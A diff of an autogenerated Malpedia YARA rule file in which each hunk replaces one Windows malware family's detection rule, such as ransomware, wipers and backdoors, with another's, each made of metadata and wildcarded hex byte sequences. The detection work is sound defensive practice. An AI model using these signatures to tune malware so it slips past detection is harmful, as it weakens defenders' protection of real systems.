-rule MALPEDIA_Win_Pss_Auto : FILE
+rule MALPEDIA_Win_Pipcreat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5d7a2f66-332a-5d9c-b5c1-576c5e994461"
+		id = "8419290f-1015-5dec-8abc-87fb98932602"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pss"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pss_auto.yar#L1-L139"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipcreat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pipcreat_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "51611bab605bb2ace0ab1fa2af33625cc29dd81f64a8b665b3e9018994b265fd"
+		logic_hash = "bfd77063c9003804a72d5e23f231f6f0ede323cbb3ca337d538e8165945eb11a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96779,35 +96922,32 @@ rule MALPEDIA_Win_Pss_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d48fe e8???????? e9???????? 83f811 }
-		$sequence_1 = { 7437 ff15???????? 3de5030000 752a }
-		$sequence_2 = { ff15???????? 83ceff 3bc6 7504 }
-		$sequence_3 = { 740a 50 ffd6 830d????????ff a1???????? 85c0 740a }
-		$sequence_4 = { 8d85eafdffff 56 50 e8???????? 83c40c }
-		$sequence_5 = { 8d4dc0 e8???????? eb23 8d45a4 }
-		$sequence_6 = { ff15???????? 56 53 8d4c2414 8bf8 }
-		$sequence_7 = { 50 8995a4f9ffff 899da0f9ffff 83cfff e8???????? 6848040000 8d85b0fbffff }
-		$sequence_8 = { 4889442448 488d15f5710100 488d4c2428 e8???????? 90 4c8d050bbe0000 }
-		$sequence_9 = { 488d050cbc0100 488b4c2430 483bc8 7405 }
-		$sequence_10 = { 488bd0 488d0dd96a0100 e8???????? 90 48837c244008 }
-		$sequence_11 = { 0f859d040000 498d4810 498bd8 4c8b09 41386919 7513 }
-		$sequence_12 = { 488bcd 895c2470 e8???????? 48634c2470 4803c9 }
+		$sequence_0 = { 85c0 75cb 8bc6 53 6bc02c c784055ceeffffffff0000 }
+		$sequence_1 = { ebd8 6a01 ffd6 33db bfc4400010 be10480010 }
+		$sequence_2 = { 668915???????? ffd6 68???????? 68???????? ffd6 68???????? e8???????? }
+		$sequence_3 = { 50 8d8528feffff 6aff 50 53 53 }
+		$sequence_4 = { 5e 81c4140a0000 c3 668b0d???????? }
+		$sequence_5 = { ff15???????? 8b35???????? 68???????? 68???????? ffd6 668b4c2410 668b15???????? }
+		$sequence_6 = { 8945f8 7f14 68e8030000 ffd6 ff4dfc 395dfc 7fd4 }
+		$sequence_7 = { 33db 57 8d85f8efffff 53 50 }
+		$sequence_8 = { 66899d28ffffff f3ab 66ab 8d8528feffff }
+		$sequence_9 = { 6a00 8b0d???????? 6a00 8d442420 6a00 }
 
 	condition:
-		7 of them and filesize < 421888
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Adhubllka_Auto : FILE
+rule MALPEDIA_Win_Isaacwiper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "60da8c7f-6dd6-527d-a4d7-5811a92e6c32"
+		id = "49055172-29cc-5c36-b567-edf9c776fb50"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.adhubllka"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.adhubllka_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.isaacwiper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.isaacwiper_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "f31f80e2e1b5812b9eab30806e14c5a9a3d65252ed9a183d7a41e8edbf56db58"
+		logic_hash = "9dc7297f4b8c766d788d99fcb182487835c35f1c6c8fa9d0d296f8378105b942"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96821,32 +96961,32 @@ rule MALPEDIA_Win_Adhubllka_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8d8dfcfcffff e8???????? 0f1085fcfcffff 8bd6 }
-		$sequence_1 = { 751e a1???????? 56 ffd0 33c0 5f }
-		$sequence_2 = { 50 ff5150 85c0 0f8804010000 }
-		$sequence_3 = { 8b8534ffffff 03c2 33f8 c1c710 03cf 33d1 c1c20c }
-		$sequence_4 = { 50 6af6 ff15???????? 8b04bd68b34100 834c0318ff 33c0 eb16 }
-		$sequence_5 = { 660ffea530ffffff 660fefc8 8345f010 0f28d4 0f1108 8b45fc }
-		$sequence_6 = { 8945dc 8b458c 03c7 c1c207 8bc8 334d84 c1c110 }
-		$sequence_7 = { 8d041e c1c007 33458c 8d3403 c1c609 }
-		$sequence_8 = { 0fbe05???????? c1e208 0bd0 c745d4bbaaffee 0fbe05???????? c1e208 0bd0 }
-		$sequence_9 = { 0f28a570feffff 0f1000 8b45f0 660ffea530ffffff 660fefc8 8345f010 0f28d4 }
+		$sequence_0 = { 48 0300 2448 0300 3448 0300 }
+		$sequence_1 = { 8d942498130000 8d8c24f0000000 e8???????? 84c0 0f84df0a0000 }
+		$sequence_2 = { 8b7514 8d442418 8b7c2414 ff7614 6a00 50 57 }
+		$sequence_3 = { 55 8bec 8b4508 56 57 8d3c8520650310 }
+		$sequence_4 = { 8d442420 56 0f43442424 50 }
+		$sequence_5 = { c70700000000 8b7dfc c70200000000 5b 894740 }
+		$sequence_6 = { 6bd738 8b0c8de8670310 c644112800 85f6 740c }
+		$sequence_7 = { 57 52 ba0a020000 8d8d90fbffff }
+		$sequence_8 = { 89842488000000 8d8424c0000000 50 c7460800000000 }
+		$sequence_9 = { 8b4804 8d41f8 89443194 8b4688 8b4004 c744308898270310 8b4688 }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 467968
 }
-rule MALPEDIA_Win_Mail_O_Auto : FILE
+rule MALPEDIA_Win_Systembc_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "22d6b28e-4151-5e9b-9587-80b5734c06d0"
+		id = "78762f50-0312-5144-8487-9132a843d75d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mail_o"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mail_o_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.systembc_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "dcb8e5253869e623d55ce118499ad5275559d95782fd4c320c46ce5ddc9c4fdf"
+		logic_hash = "0c55a2c050a3bb97541957e7a554780d9460670263a6f5688965634c91b9bb06"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96860,32 +97000,32 @@ rule MALPEDIA_Win_Mail_O_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 83a3980e0000fd 4889bb800e0000 488bcb 4889bb800e0000 e8???????? 488b8b60100000 }
-		$sequence_1 = { ffc7 4883c302 493bde 7cd7 488b8c24a0000000 ba01000000 448d42fe }
-		$sequence_2 = { eb2e 488d15518b1500 488bcf e8???????? 85c0 7405 830b02 }
-		$sequence_3 = { e8???????? 8bf8 85c0 7563 488d15563e1700 488bcb e8???????? }
-		$sequence_4 = { f30fe6d2 8bd7 e8???????? 03ef 85db 7ea1 2bdf }
-		$sequence_5 = { 7cda 488b4f20 488bd6 e8???????? 4885c0 0f8459020000 418bec }
-		$sequence_6 = { e9???????? 4183fd00 743e 492bed 4d8bc5 488bd5 488bcf }
-		$sequence_7 = { e8???????? b8ffffffff e9???????? 448b8c24a0000000 4183f901 746a 4c8d0578650900 }
-		$sequence_8 = { bfffffffff e9???????? f7432000010000 4889742440 740f 488bd3 488d0da3050000 }
-		$sequence_9 = { 7442 488bce 4c8d2defdb0b00 0f1f4000 6666660f1f840000000000 410fb61408 48ffc1 }
+		$sequence_0 = { 8bec 53 57 56 8b7d10 }
+		$sequence_1 = { 7507 66837fff00 740d 837d1000 7409 66837aff00 7502 }
+		$sequence_2 = { 8b4d0c 837d0c00 750b ff7508 e8???????? }
+		$sequence_3 = { 837d0cfe 751c 837d1000 7507 66837fff00 }
+		$sequence_4 = { 50 8b45f8 8b08 50 8b4178 }
+		$sequence_5 = { 6a00 8d85fcfbffff 50 8b45f8 8b08 }
+		$sequence_6 = { 740d 837d1000 7409 66837aff00 7502 eb2e }
+		$sequence_7 = { 837d0cfe 751c 837d1000 7507 66837fff00 740d 837d1000 }
+		$sequence_8 = { c9 c21400 55 8bec 53 57 56 }
+		$sequence_9 = { 8b450c ab 8b4514 ab }
 
 	condition:
-		7 of them and filesize < 5985280
+		7 of them and filesize < 75776
 }
-rule MALPEDIA_Win_Miancha_Auto : FILE
+rule MALPEDIA_Win_Unidentified_074_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0fca04e0-92f2-5b94-88d0-1960dbccd943"
+		id = "18d2173e-134a-5069-ab8f-b9abd19f1bd3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.miancha_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_074"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_074_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "265db074bcd13da1887f66f32f80a00bfe9fccbd1f685bc2e9a0d53a7fe9cd80"
+		logic_hash = "6dab9e5ae43cc86eae4e300f173218fa8732c7df5d913a5bb2fedc84e5de19c3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96899,32 +97039,32 @@ rule MALPEDIA_Win_Miancha_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8910 8b15???????? 894804 8b0d???????? 895008 8a15???????? 89480c }
-		$sequence_1 = { 6a02 6a00 68???????? 52 ffd6 }
-		$sequence_2 = { 52 ff15???????? 50 ffd6 85c0 741a 837c241800 }
-		$sequence_3 = { 50 8d4e01 51 68???????? e8???????? }
-		$sequence_4 = { 56 8b35???????? 6a02 6a00 68???????? }
-		$sequence_5 = { 68???????? 68???????? c744242000000000 ff15???????? 50 ff15???????? 8bf0 }
-		$sequence_6 = { 6a01 6a00 68???????? 51 ffd6 85c0 }
-		$sequence_7 = { 68???????? 68???????? c744242000000000 ff15???????? 50 ff15???????? }
-		$sequence_8 = { 85f6 7412 8d542418 52 }
-		$sequence_9 = { 7412 8d542418 52 ff15???????? 50 ffd6 }
+		$sequence_0 = { 7417 0fb732 8bcb b8???????? 663930 }
+		$sequence_1 = { 33c0 c78524e7ffff07000000 66898510e7ffff 8d85f8e6ffff 50 8d8540e7ffff }
+		$sequence_2 = { 8b07 eb02 8bc7 8b55e0 }
+		$sequence_3 = { 68???????? c60300 e8???????? 8d8d58e7ffff e8???????? }
+		$sequence_4 = { 894dfc 8b7e10 c745f001000000 8b4310 40 }
+		$sequence_5 = { c78524e7ffff07000000 66898510e7ffff 8d85f8e6ffff 50 8d8540e7ffff c78520e7ffff00000000 50 }
+		$sequence_6 = { 7504 33c9 eb18 8d8d88e7ffff 8d5102 668b01 }
+		$sequence_7 = { 68???????? 50 e8???????? 8b4dfc 83c424 f7d8 }
+		$sequence_8 = { 50 ffb578dfffff e8???????? 33c0 c7858cdfffff07000000 }
+		$sequence_9 = { e8???????? c743140f000000 c7431000000000 c60300 8b9584e7ffff 83fa10 }
 
 	condition:
-		7 of them and filesize < 376832
+		7 of them and filesize < 335872
 }
-rule MALPEDIA_Win_Minitypeframe_Auto : FILE
+rule MALPEDIA_Win_Punkey_Pos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "40e88a96-d1cd-5006-9a0d-53fcc15d287e"
+		id = "4e1fe79b-2125-523a-abd5-f08f284bf027"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.minitypeframe"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.minitypeframe_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.punkey_pos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.punkey_pos_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "8864a5220eda366ec3f0b791c455ecd5bc17a2ac1068453ffa5046f89df1e064"
+		logic_hash = "be3234349330303fdbacc67e779ee45aced60b2ad5880e7a508a6b6e58a3eaf4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96938,32 +97078,32 @@ rule MALPEDIA_Win_Minitypeframe_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 750d c744246c87010000 e9???????? 83fb21 753b 8b44245c }
-		$sequence_1 = { 50 8d542434 51 52 e8???????? 83c41c 8d44241c }
-		$sequence_2 = { c684248c00000034 c684248d000000a3 c684248e00000038 c684248f00000037 c684249000000008 c68424910000007f c6842492000000c7 }
-		$sequence_3 = { 8d8c24fc000000 50 51 e8???????? 83c41c 8b86cc000000 85c0 }
-		$sequence_4 = { 7521 6a01 8d442410 6829800000 50 e8???????? 83c40c }
-		$sequence_5 = { 8d049560740a10 50 ff500c 83c40c 5e 83c41c c3 }
-		$sequence_6 = { 51 e8???????? 8d54243c 8d8424a4000000 52 50 }
-		$sequence_7 = { 895c2434 8b542444 8b44245c 89542464 }
-		$sequence_8 = { 8b542454 894c2434 8b0d???????? 89442430 8b442458 51 57 }
-		$sequence_9 = { 8d8c24c8000000 85c9 7421 8d9424c8000000 55 52 e8???????? }
+		$sequence_0 = { 57 8b7d0c f7c600000040 741d }
+		$sequence_1 = { 85c0 740e 56 57 68e7070000 50 }
+		$sequence_2 = { a3???????? ff15???????? 8bf0 85f6 7508 5f 33c0 }
+		$sequence_3 = { 56 57 756b 8b4508 }
+		$sequence_4 = { 56 ffd7 a3???????? 85c0 74ae 5f b801000000 }
+		$sequence_5 = { 85c0 740e 56 57 68e7070000 }
+		$sequence_6 = { a3???????? 85c0 74ae 5f b801000000 }
+		$sequence_7 = { 55 8bec 837d0c01 56 57 756b }
+		$sequence_8 = { ffd7 a3???????? 85c0 74d0 }
+		$sequence_9 = { 5d c20c00 75e5 56 8b7510 }
 
 	condition:
-		7 of them and filesize < 1589248
+		7 of them and filesize < 499712
 }
-rule MALPEDIA_Win_Breakthrough_Loader_Auto : FILE
+rule MALPEDIA_Win_Turla_Silentmoon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0193d887-590b-5255-aefc-27c1cd144cae"
+		id = "3bd3f75c-66e7-530a-b900-053594c9b821"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.breakthrough_loader_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_silentmoon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.turla_silentmoon_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "ea01661f3f714348cfd1bd7d048f5208e62d40484683d30237ed92dc307f011d"
+		logic_hash = "1fa09fbf5696dc9d66cc7dcda76511a0b5324dc46891c26079664b06f37ad447"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96977,34 +97117,34 @@ rule MALPEDIA_Win_Breakthrough_Loader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d8038154500 8945e4 803800 8bc8 7435 }
-		$sequence_1 = { 83e13f c1f806 6bc930 8b048540354500 80640828fe ff33 }
-		$sequence_2 = { 663b88b0924400 740d 83c002 83f814 72ef 33c0 40 }
-		$sequence_3 = { c745c007000000 8bf1 668945ac 8945d4 668945c4 8b450c 807e4800 }
-		$sequence_4 = { 57 e8???????? 83c414 8d4de4 837df810 8bf0 }
-		$sequence_5 = { c745f800000000 c645e800 83f810 720d }
-		$sequence_6 = { 59 83f80a 7336 8b4d88 83f924 7d0f 8a809c384400 }
-		$sequence_7 = { 8b049540354500 c644012801 8b049540354500 897c0118 8bfe e9???????? }
-		$sequence_8 = { eb55 8b1c9dcc614400 56 6800080000 6a00 }
-		$sequence_9 = { 83e03f c1f906 6bf030 03348d40354500 837e18ff 740c 837e18fe }
+		$sequence_0 = { 40 83bc85ecf7ffff00 74f5 8b7508 8b3496 ff8c85ecf7ffff }
+		$sequence_1 = { 8b01 8b4d10 52 8b55f4 03c3 03d3 e8???????? }
+		$sequence_2 = { 898e5c020000 0fb77c7b10 897df4 8b3cba 897dd4 8b7df4 0fb63c38 }
+		$sequence_3 = { 69c002010000 03c6 c745d800000000 8945e0 8bff 8b45f4 99 }
+		$sequence_4 = { 4a 8917 8d79ff 893c96 0fb678ff 8b55fc 66c1ea08 }
+		$sequence_5 = { 51 89442434 ff15???????? 8b5508 }
+		$sequence_6 = { 7c13 53 8bc6 e8???????? 83c404 897e08 e9???????? }
+		$sequence_7 = { 6a64 8d4598 6a00 50 e8???????? 68c8000000 }
+		$sequence_8 = { 8a5c3e03 3ada 75d2 8a543804 8a5c3e04 3ada 75c6 }
+		$sequence_9 = { 8b4510 8d7c50fc 33c0 66894704 8b450c 0fb60410 c1f908 }
 
 	condition:
-		7 of them and filesize < 753664
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Nimplant_Auto : FILE
+rule MALPEDIA_Win_Soul_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ab9ad292-a36d-5023-b871-7d5dcf59a376"
+		id = "e9dd6236-3340-50b4-b5d0-39eff17887cc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimplant"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nimplant_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.soul"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.soul_auto.yar#L1-L235"
 		license_url = "N/A"
-		logic_hash = "78100de3c1ed8ac731d4871e0295c4754b22f71e68f7be54c12e992f0adcf829"
+		logic_hash = "006ca2db66b727a223c7e1c69f1643e1ec1c7be66a86b7b95f1d15a0130986f8"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -97016,32 +97156,45 @@ rule MALPEDIA_Win_Nimplant_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 4883ec30 4889cb 4885c9 7417 488b01 6683781201 }
-		$sequence_1 = { c644020800 4889842480000000 488b442440 803800 0f85e0faffff ba01000000 4c89f9 }
-		$sequence_2 = { e8???????? 803b00 0f842cceffff 0f1f8000000000 488b842428020000 48898424b0010000 48c744243000000000 }
-		$sequence_3 = { 488b8c24b0010000 e8???????? 803b00 0f853c010000 488b942450010000 4885d2 7413 }
-		$sequence_4 = { 660f1f440000 410fb63f 41c60700 4885f6 7413 48b80000000000000040 488506 }
-		$sequence_5 = { 4c8d0d69880500 4889c1 488b05???????? 4c8d056f880500 48895110 488901 488d05bf880500 }
-		$sequence_6 = { e8???????? 803b00 0f8515feffff 4885f6 7413 48b80000000000000040 488506 }
-		$sequence_7 = { e8???????? 803800 7561 488b03 488d0d2fde0900 480fbf7010 e8???????? }
-		$sequence_8 = { 4c8d7c2460 f3440f6f05???????? 4c8d742430 488b442478 4c89e6 4c89ea 4889e9 }
-		$sequence_9 = { 4c89f9 4c894c2420 e8???????? 803b00 4c8b4c2420 0f85bd010000 f30f6f15???????? }
+		$sequence_0 = { d3e2 8515???????? 7405 e8???????? }
+		$sequence_1 = { 40 803800 75f8 c745fc00000000 90 56 ff15???????? }
+		$sequence_2 = { 57 8bf8 be???????? 743a 8da42400000000 }
+		$sequence_3 = { ff25???????? 48895c2408 4889742410 57 4883ec30 }
+		$sequence_4 = { 7cde c745fc00000000 8da42400000000 8b4df8 51 57 }
+		$sequence_5 = { 741f 8da42400000000 8b03 57 50 }
+		$sequence_6 = { 85f6 0f84a4000000 803f00 8bc7 }
+		$sequence_7 = { 85f6 7506 837dfc04 7cda }
+		$sequence_8 = { 7409 90 fe08 40 803800 }
+		$sequence_9 = { 83c404 33f6 897304 8b4304 }
+		$sequence_10 = { eb22 e8???????? 488b4c2420 ffd0 90 48837c245008 }
+		$sequence_11 = { c744243a66003600 66448974243e 488d1d4ad10100 488bc3 488d7c2448 482bfb 0fb710 }
+		$sequence_12 = { ffc7 4883c202 413bf8 72db 8bce 85f6 743c }
+		$sequence_13 = { 7507 c743089a020000 85c0 0f84be010000 83f802 0f84b5010000 83f801 }
+		$sequence_14 = { 741a 488d05f9ef0000 483bf8 740e 833f00 }
+		$sequence_15 = { 4c8bf1 b801000000 85ff 7404 8932 eb06 8bf8 }
+		$sequence_16 = { c745c047006c00 c745c662006100 c745ca6c005c00 668945ec c745ce43006100 c745d468006500 }
+		$sequence_17 = { 442bda 4183fb0f 731e 0fb606 418bcb 4883c602 }
+		$sequence_18 = { e8???????? 41894620 458bef 418bff 41c74608373f0000 eb05 }
+		$sequence_19 = { 488b4593 89442448 8bc8 e8???????? 488bf0 33c0 8945c7 }
+		$sequence_20 = { 4883eb02 4983c9ff ebae 488d45ef 4c8b4507 4983f808 490f43c4 }
+		$sequence_21 = { eb2e 4c8b542418 33ed 0f1f840000000000 420fb60411 48ffc1 }
+		$sequence_22 = { 488d1dc7850000 488d3de0850000 eb0e 488b03 4885c0 7402 }
 
 	condition:
-		7 of them and filesize < 1811456
+		7 of them and filesize < 1400832
 }
-rule MALPEDIA_Win_Ratankba_Auto : FILE
+rule MALPEDIA_Win_Eternal_Petya_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5b767439-8a52-5082-a849-b72a22dc7deb"
+		id = "5412d86d-0c91-551e-8b1c-043b9779137a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankba"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ratankba_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.eternal_petya_auto.yar#L1-L164"
 		license_url = "N/A"
-		logic_hash = "28a3493a9c6143ba99ec99eb8912043c44e1319e93a131fe32deda9f1f93952d"
+		logic_hash = "3d823703098c3ea98ac24fd4bb7c283e7fba6eebd623c0da8c21f46950e9dc6a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97055,32 +97208,38 @@ rule MALPEDIA_Win_Ratankba_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d1443 895108 33d2 3911 7637 }
-		$sequence_1 = { 8b4de4 891cc1 46 eb96 8b5710 8bc6 8955e4 }
-		$sequence_2 = { 897004 83ff09 750c 8b45f4 5f }
-		$sequence_3 = { 0f83a9000000 52 56 8d8d00ffffff }
-		$sequence_4 = { 6800000001 50 51 56 ff15???????? 85c0 750c }
-		$sequence_5 = { 8b1d???????? 3bfe 7413 8b4df0 8b55ec 51 }
-		$sequence_6 = { 3bce 7f13 7c05 83f820 730c }
-		$sequence_7 = { e8???????? 8b86dc000000 3bc3 7409 50 e8???????? 83c404 }
-		$sequence_8 = { 8955e4 8945f8 e8???????? 8945f4 85c0 }
-		$sequence_9 = { 899ef4000000 66898ee4000000 8d8e00010000 c645fc07 33d2 }
+		$sequence_0 = { 53 6a21 8d460c 50 }
+		$sequence_1 = { 55 8bec 51 57 68000000f0 6a18 33ff }
+		$sequence_2 = { 53 68f0000000 6a40 ff15???????? 8bd8 }
+		$sequence_3 = { 53 8d4644 50 53 }
+		$sequence_4 = { 49 75f7 8b7508 895de4 }
+		$sequence_5 = { 49 75f9 6800400000 56 }
+		$sequence_6 = { 0f86eef9ffff 6afe 58 5f }
+		$sequence_7 = { 49 75f2 8b4364 034360 8b4b68 894dd4 3bc8 }
+		$sequence_8 = { 55 8bec e8???????? 8b4d08 85c9 }
+		$sequence_9 = { 03c8 8bc2 c1e818 03c8 33c0 }
+		$sequence_10 = { 03c8 ff442418 ff442410 89940ca0020000 }
+		$sequence_11 = { 33db 53 ffd7 50 ff15???????? 5f 8bc3 }
+		$sequence_12 = { ffd7 a3???????? ffd6 50 6a00 68???????? 6a02 }
+		$sequence_13 = { 8bc6 5e 5b c21000 b8???????? a3???????? }
+		$sequence_14 = { 8bc6 90 0fb708 66890c03 }
+		$sequence_15 = { 8bc6 c1f805 57 83e61f 8d3c8500cc4400 }
 
 	condition:
-		7 of them and filesize < 303104
+		7 of them and filesize < 851968
 }
-rule MALPEDIA_Win_Exaramel_Auto : FILE
+rule MALPEDIA_Win_Darkside_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "35622950-7b6c-5e19-8133-d0f2264aa9e8"
+		id = "78d056bd-691e-5837-8a3e-d494c36948d5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.exaramel"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.exaramel_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkside"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkside_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "18c202b1bcb977a24c7c95e5ee5eaa9ad9563136df2ac39652d73a4b9f53b5e1"
+		logic_hash = "6b8e9b7a9d216743f758468d2821e935f995800b913ca32663480c8ad049b99d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97094,32 +97253,32 @@ rule MALPEDIA_Win_Exaramel_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d85d8faffff 50 ff15???????? 85c0 0f84fd000000 68???????? 8d85d8faffff }
-		$sequence_1 = { 8945fc 53 8b5d0c 8d85f0fdffff }
-		$sequence_2 = { 56 56 50 6809040000 }
-		$sequence_3 = { e8???????? 83c404 c70600000000 33c0 5f 5e }
-		$sequence_4 = { ff2485e84e4000 668b4604 83c704 83c304 668901 83c604 e9???????? }
-		$sequence_5 = { 8bff 55 8bec 8b4508 57 8d3c85e0e04100 8b0f }
-		$sequence_6 = { 6a00 6a01 6800000080 894dc0 8b4d10 50 894dc4 }
-		$sequence_7 = { c70600000000 740a b80b000280 5e }
-		$sequence_8 = { 3bf0 8b4508 0f47f9 85ff 740d 2bf0 8a0c06 }
-		$sequence_9 = { ffb5f0fdffff ff15???????? 50 e8???????? 68???????? 8d85f4fdffff 50 }
+		$sequence_0 = { 59 5b 5d c20c00 55 }
+		$sequence_1 = { 81c7ff000000 4b 85db 75ea 85d2 7407 }
+		$sequence_2 = { 7306 fec1 75da eb06 33db fec1 }
+		$sequence_3 = { 57 b9f0000000 be???????? 8b4508 }
+		$sequence_4 = { 81eb10101010 81ef10101010 83e910 79d5 33d2 33c9 8b750c }
+		$sequence_5 = { 59 5b 5d c20800 55 8bec 53 }
+		$sequence_6 = { 83e910 79d5 33d2 33c9 8b750c 33db }
+		$sequence_7 = { 4b 85db 75ea 85d2 7407 }
+		$sequence_8 = { 83e910 79d5 33d2 33c9 8b750c }
+		$sequence_9 = { 893c0e 81ea10101010 2d10101010 81eb10101010 81ef10101010 83e910 }
 
 	condition:
-		7 of them and filesize < 294912
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Nagini_Auto : FILE
+rule MALPEDIA_Win_Sidewalk_Auto : FILE
 {
